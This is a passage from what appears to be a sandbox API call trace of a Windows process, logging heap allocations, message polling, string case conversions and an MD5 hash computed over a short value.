lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0102.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0102.968] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0102.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0102.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0102.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0102.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0102.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0102.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0102.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0102.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0102.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0102.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0102.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0102.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0102.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0102.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0102.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0102.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0102.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0102.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0102.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0102.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0102.969] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0102.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73b78 | out: hHeap=0x2af0000) returned 1 [0102.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0102.969] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0102.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0102.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0102.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0102.969] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0102.969] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0102.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0102.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0102.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0102.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0102.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0102.970] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0102.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0102.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0102.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99b8 [0102.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0102.970] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0102.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0102.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0102.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0102.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0102.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0102.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0102.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0102.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0102.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0102.970] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0102.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0102.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0102.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0102.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0102.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0102.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0102.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0102.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0102.971] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0102.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0102.971] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0102.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0102.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0102.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0102.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0102.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0102.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0102.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0102.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0102.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0102.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0102.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0102.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0102.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0102.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0102.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0102.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0103.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0103.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0103.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0103.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0103.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0103.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0103.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0103.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0103.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0103.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0103.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0103.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0103.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0103.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0103.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0103.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0103.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0103.018] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0103.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0103.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0103.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ce8 [0103.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0103.018] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0103.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0103.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0103.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0103.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0103.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0103.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0103.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0103.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0103.019] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0103.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0103.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0103.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0103.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0103.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0103.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0103.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0103.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0103.019] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0103.019] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0103.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0103.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0103.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0103.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0103.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0103.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0103.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0103.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0103.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0103.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0103.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0103.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0103.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0103.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0103.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0103.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0103.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0103.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0103.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0103.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0103.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0103.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0103.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0103.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0103.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0103.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0103.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0103.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0103.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0103.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0103.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0103.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0103.020] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0103.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0103.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0103.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0103.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0103.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0103.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0103.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0103.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0103.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0103.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0103.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0103.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0103.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0103.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0103.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0103.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0103.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0103.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0103.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0103.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0103.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0103.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0103.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0103.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0103.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aa9f10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0103.021] CryptCreateHash (in: hProv=0x9bf330, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0103.021] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.021] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.022] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.022] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0103.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b28, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0103.022] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0103.022] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0103.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b78, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0103.022] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.022] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.022] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.022] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.022] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.022] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.022] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0103.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aa9cd0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0103.022] CryptHashData (hHash=0x9a3b80, pbData=0x2a71ad8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0103.022] 